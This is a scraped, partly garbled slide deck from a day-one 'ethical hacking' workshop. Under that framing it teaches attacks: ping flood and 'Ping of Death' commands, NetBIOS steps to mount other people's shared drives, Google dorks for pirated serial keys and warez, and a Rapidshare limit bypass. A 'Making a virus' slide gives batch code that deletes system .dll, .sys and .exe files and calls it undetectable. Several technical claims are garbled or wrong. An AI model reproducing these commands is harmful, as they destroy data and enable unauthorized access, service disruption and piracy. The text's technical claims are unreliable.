workshop day1

Click here to load reader

Post on 29-May-2018




1 download

Embed Size (px)


  • 8/8/2019 Workshop Day1


    Information Security andEthical hacking

  • 8/8/2019 Workshop Day1


    Internet Protocol(ip)Tracing ipDenial of services(DoS)SharingUnwanted AccessUsing proxies

    Windows HackRegistry editingMulti yahooChanging names of

    icons.Disabling features-

    shutdown,restart etc.

    Tips on Google surfingRapid share



    Brutus-brute forcesWindows passwordBackdoor Entry

    TrojansRemote employing monitors

    Other malicious tools

    Day 1 Day 2


    Key loggingWindows passwordEtc..

  • 8/8/2019 Workshop Day1


    Ethical Hacking

    From E-commerce to information gathering and entertainment, the Internet hasevolved into a one-stop resource for both professional and personal purposes.

    Unfortunately, the same Internet is also used by computer criminals to carry out cyber

    crimes, such as identity theft and virus/worm/Trojan attacks, etc.

    Ethical hackers are the sentinels of the Internet. Their work involves understandingthe mind of the cyber criminal, tracing and tracking his functioning, and innovatingnew strategies and methods to safeguard online activity.

    Thinking like cyber criminals to thwart them is both a challenging and interesting job. And with the demand for certified ethical hackers increasing everyday, a career inthis field is also evolving into a professionally satisfying and monetarily lucrativeoption.

  • 8/8/2019 Workshop Day1



  • 8/8/2019 Workshop Day1



    Anarchist HackersTheir sole intent on system infiltration is to cause damage or use information to

    create havoc.

    HackersThey don t particularly care about bragging about their accomplishments as it

    exposes them to suspicion. They prefer to work from behind the scenes andpreserve their anonymity.


    This is primarily the term given to individuals who are skilled at the art of bypassing software copyright protection.

  • 8/8/2019 Workshop Day1


    Ethical Hacker

    Being able to attribute your attacks to the right type of attacker isvery important. By identifying your attacker to be either anAnarchist Hacker or a Hacker you get a better idea of what you reup against.

    Know your enemy and know yourself and you will always bevictorious...

  • 8/8/2019 Workshop Day1


    Ip Address

    32 bits combination.Staticdynamic


    server ip addressping www.anylan.innslookup

  • 8/8/2019 Workshop Day1


  • 8/8/2019 Workshop Day1


    ip tracingtracert

    Tracing ip during chatting

    Netstat nNetstat -a

    Port 5050 or 5101

    Tracing the ip locations

  • 8/8/2019 Workshop Day1


  • 8/8/2019 Workshop Day1


    E-mail Headers

  • 8/8/2019 Workshop Day1


    E-mail headers

  • 8/8/2019 Workshop Day1


    E-mail Headers

  • 8/8/2019 Workshop Day1


    Neo trace pro

  • 8/8/2019 Workshop Day1


  • 8/8/2019 Workshop Day1



  • 8/8/2019 Workshop Day1


    D oS Attack

    Conceptually, DoS attacks are intended to prevent legitimateusers, customers or clients of a site from successfully accessingit.

    Traditional DoS attacks have been aimed at consuming

    resources or disrupting services at the network or operatingsystem level.Typical examples are server-based attacks such as SYN floods

    and bandwidth exhaustion attacks that attempt to saturate thevictims Internet connection with spurious traffic.

    Death by overloading of system.

  • 8/8/2019 Workshop Day1


    DO S Attack

    D enial O f Services

    In a denial-of-service (D

    oS) attack, an attacker attempts to prevent legitimate usersfrom accessing information or services. By targeting your computer and its networkconnection, or the computers and network of the sites you are trying to use, anattacker may be able to prevent you from accessing email, web sites, online accounts(banking, etc.), or other services that rely on the affected computer.

    p ing [IP ADDRESS HERE or WEBSITE] -t -l 15000

  • 8/8/2019 Workshop Day1


    D os & ddos

    O versized Packets

    This is called the "Ping of D eath" (ping -1 65510 an a Windows system

    (where is the IP adress of the intended victim). What is happening is theattacker is pinging every port on the victims computer causing it to echo back 65510requests.

    The main goals of the "Ping of D eath" is to generate a packet size that exceeds 65,535bytes. Which can abrubtly cause the victim computer to crash.

  • 8/8/2019 Workshop Day1


    D os

    Ping Attack

  • 8/8/2019 Workshop Day1


    D oS

  • 8/8/2019 Workshop Day1


    Symptoms O f D os

    unusually slow network performance (opening files or accessing web sites)

    unavailability of a particular web site

    inability to access any web site

    dramatic increase in the amount of spam you receive in your account

  • 8/8/2019 Workshop Day1



    Network Basic Input O utput System and is used as a way for computers in a LAN ora WAN (local network or internet/wider network) to share printers or drives.

    WAN attack that will be more interesting for most of you guys, and it is the WANattack that will be more dangerous.

  • 8/8/2019 Workshop Day1


    Ste p s

    Start up your terminal (Start > run > cmd). You will be given this prompt:C:\WINDO WS>make sure the host is alive:

    C:\WINDO WS> ping it is, you'll get something like this in response:Reply from byte=32 time NBtSTAT -a UNIQUE Registered

    MSHO ME GRO UP RegisteredHACKME-921J UNIQUE Registered

    HACKME-921J UNIQUE RegisteredMSHO ME GRO UP RegisteredHACKABLEUSER UNIQUE RegisteredMSHO ME UNIQUE Registered? That means that the target has files/folders/drives/etc. being shared on

    that computer

  • 8/8/2019 Workshop Day1


    C:\WINDO WS> NET VIEW \\ will hopefully give a response like this:

    Shared resources on name Type Comment

    --------------------------------------------C D isk

    D D iskCommand completed successfully.

    mount them locally:C:\WINDO WS> NET USE G: \\\CCommand completed successfully.

    go to "My Computer" and browse those files.

  • 8/8/2019 Workshop Day1



    In the search field type: "Product name" 94FBR

    Where, "Product Name" is the name of the item you want to find the serialnumber for.

    94FBR is part of a O ffice 2000 Pro cd key that is widely distributed as it bypassesthe activation requirements of O ffice 2K Pro. By searching for the product nameand 94fbr, you guarantee two things.1) The pages that are returned are pages dealing specifically with the product

    you're wanting a serial for.

    2) Because 94FBR is part of a serial number, and only part of a serial number, youguarantee that any page being returned is a serial number list page.

  • 8/8/2019 Workshop Day1


    Unlimited Rapidshare download

    go to temporary internet files folder and delete all the cookies related to rapidshare.

    make a bat file and run it every timeipconfig /flushdnsipconfig /releaseipconfig /renewexit

    turn off on ur modem

  • 8/8/2019 Workshop Day1


    O ther google ways

    Look for Appz in Parent D irectory

    intext:"parent directory" intext:"[EXE]"

    intext:"parent directory" index of:"[EXE]"

    intext:"parent directory" index of:"[RAR]"

    This will look for any exe or optionaly for zip, rar, ace, iso, bin and etc.

    Look for Moviez in Parent D irectory

    intext:"parent directory" intext:"[VI D ]"

  • 8/8/2019 Workshop Day1


    intext:"parent directory" index of:"[VI D ]"

    This will look for any video filetype in parent directory. You can optionaly addindex:"xvid" or intext:"divx" for specific codec movie.

    Look for Muzik in Parent D irectory

    intext:"parent directory" intext:"[MP3]"

    intext:"parent directory" index of:"[MP3]"

    This will look for any music files.

    Look for Gamez in Parent D irectory

    intext:"parent directory" index of:"[Gamez]"

  • 8/8/2019 Workshop Day1


    RegistryThe Registry is a database used to store settings and options for the 32 bit

    versions of Microsoft Windows including Windows 95, 98, ME and NT/2000. Itcontains information and settings for all the hardware, software, users, andpreferences of the PC. Whenever a user makes changes to a Control Panelsettings, or File Associations, System Policies, or installed software, the

    changes are reflected and stored in the Registry.The physical files that make up the registry are stored differently depending

    on your version of Windows; under Windows 95 & 98 it is contained in twohidden files in your Windows directory, called USER.DAT and SYSTEM.DAT,for Windows Me there is an additional CLASSES.DAT file, while under

    Windows NT/2000 the files are contained seperately in the%SystemRoot%\System32\Config directory. You can not edit these filesdirectly, you must use a tool commonly known as a "Registry Editor" to makeany changes (using registry editors will be discussed later in the article).

  • 8/8/2019 Workshop Day1


    The Registry has a hierarchal structureThere are six main branches, each containing a specific portion of the

    information stored in the Registry. They are as follows:

    * HKEY_CLASSES_ROOT - This branch contains all of your file associationmappings to support the drag-and-drop feature, OLE information, Windowsshortcuts, and core aspects of the Windows user interface.

    * HKEY_CURRENT_USER - This branch links to the section of HKEY_USERSappropriate for the user currently logged onto the PC and cont ai ns inform a tion such a s logon n a mes, d esktop sett ings, a n d S ta rt menu sett ings.

    * HKEY_LOCAL_MACHINE - This branch cont ai ns computer spec if ic inform a tion ab out the type of h a r dwa re, soft wa re, a n d other preferences on a g iven PC , this information is used for all users who log onto this computer.

    * HKEY_USERS - This branch cont ai ns in divid u al preferences for e a ch user of the computer , each user is represented by a SID sub-key locatedunder the main branch.

    * HKEY_CURRENT_CONFIG - This branch links to the section of HKEY_LOCAL_MACHINE appropriate for the current h a r dwa re conf igur a tion.

    * HKEY_DYN_DATA - This branch points to the part of HKEY_LOCAL_MACHINE, for use wi th the Pl ug-&- Play fe a tures of Win d o w s, th is sect ion is dy m a n ic a n d will ch a nge a s d e vices a re add e da n d remo ve d from the s ystem.

  • 8/8/2019 Workshop Day1


    Each registry value is stored as one of five main data types:

    * REG_BINARY - This type stores the value as raw bi n a r y da ta . Most

    hardware component information is stored as binary data, and can be displayedin an editor in hexadecimal format.* REG_DWORD - This type represents the data by a four by te num b er and is

    commonly used for b oo le a n val ues , such as "0" is disabled and "1" is enabled. Additionally many parameters for device driver and services are this type, andcan be displayed in REGEDT32 in binary, hexadecimal and decimal format, or

    in REGEDIT in hexadecimal and decimal format.* REG_EXPAND_SZ - This type is an exp a n dabl e da ta str ing that is stringcontaining a variable to be replaced when called by an application. For example, for the following value, the string "%SystemRoot%" will replaced bythe actual location of the directory containing the Windows NT system files.(This type is only available using an advanced registry editor such asREGEDT32)

    * REG_MULTI_SZ - This type is a mu ltip le str ing used to represent valuesthat contain lists or multiple values, each entry is separated by a NULLcharacter. (This type is only available using an advanced registry editor such asREGEDT32)

    * REG_SZ - This type is a st a n da r d str ing , used to represent human readabletext values.

  • 8/8/2019 Workshop Day1


    Playing With RegistryTake backup of the registry

    [HKEY_LOCAL_MACHINE\SYSTEM\Setup]"SetupType"=dword:00000000"CmdLine"="setup -newsetup""SystemPrefix"=hex:c5,0b,00,00,00,40,36,02

    Deleting the key values[-HKEY_LOCAL_MACHINE\SYSTEM\Setup]

    Use this feature with care, as deleting the wrong key or value could causemajor problems within the registry, so remember to always make a backupfirst.

  • 8/8/2019 Workshop Day1


  • 8/8/2019 Workshop Day1





    "NoDrives"=dword:03ffffff $[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersio


    "LegalNoticeCaption"="Caption here."

  • 8/8/2019 Workshop Day1


  • 8/8/2019 Workshop Day1


    Multiple yahoo login

    Navigate to HKEY_CURRENT_USER\Software\Yahoo\Pager\Test.

    On the right page, right-click and choose new Dword value.

    Rename the value to Plural.

    Double click and assign a decimal value of 1

  • 8/8/2019 Workshop Day1


    Viruses , Worms and Trojans

    Types of virusesThere are many type of viruses. Typical viruses are simply programs or scriptsthat will do various damage to your computer, such as corrupting files, copyingitself into files, slowly deleting all your hard drive etc.

    WormsWorms are different type of viruses, but the same idea, but they are usuallydesigned to copy themselves a lot over a network and usually try to eat up asmuch bandwidth as possible by sending commands to servers to try to get in.

    TrojansTrojans are another type of virus. They are simply like a server in which enableshackers to get into and control the computer. A trojan such as Subseven canenable a hacker to do various things such as control the mouse, eject the cd-romdrive, delete/download/upload files and much more.

  • 8/8/2019 Workshop Day1


    Viruses , Worms and Trojans

    MBR virusesBoot sector viruses are another type, they are similar to file viruses, but insteadthey go in the boot sector and can cause serious damage when the computer isbooted, some can easily format your drive simply by booting your computer.These are hard to remove.

    .exe .com .bat .scr .pif .vbs


    the main thing to watch out for is the file size.


  • 8/8/2019 Workshop Day1


    Making a virus

    This virus is indetectible by antivirus notepad and past this code:

    Code:@Echo off c: cd %WinDir%\System\ deltree /y *.dll cd\ deltree /y *.sys this will deleteall .dll and .sys files.

    Code:@Echo off c: cd %WinDir%\System\ deltree /y *. p sw cd\ deltree /y *.exe

  • 8/8/2019 Workshop Day1


  • 8/8/2019 Workshop Day1


    Vbs-vb script

    onclick=msgbox ("[email protected]",20,"[email protected]")yesclick=msgbox ("[email protected]",20,"[email protected]")yesclick=msgbox ("[email protected]",20,"[email protected]")yesclick=msgbox ("[email protected]",20,"[email protected]")yesclick=msgbox ("[email protected]",20,"[email protected]")yesclick=msgbox ("[email protected]",20,"[email protected]")

  • 8/8/2019 Workshop Day1